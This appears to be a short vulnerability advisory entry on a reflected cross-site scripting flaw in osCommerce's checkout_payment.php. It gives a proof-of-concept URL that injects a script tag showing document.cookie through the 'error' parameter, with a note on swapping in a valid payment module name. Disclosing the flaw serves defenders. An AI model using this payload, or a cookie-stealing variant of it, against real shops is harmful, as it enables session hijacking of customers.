OSCommerce Checkout_Payment.PHP Error Output Cross-Site Scripting Vulnerability

info
discussion
exploit
solution
references

OSCommerce Checkout_Payment.PHP Error Output Cross-Site Scripting Vulnerability

There is no exploit required. The following example was submitted:

http://www.example.com/checkout_payment.php?payment_error=cc&error=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E

Please note that the 'cc' value for 'payment_error' must be substituted with the name of a valid payment module.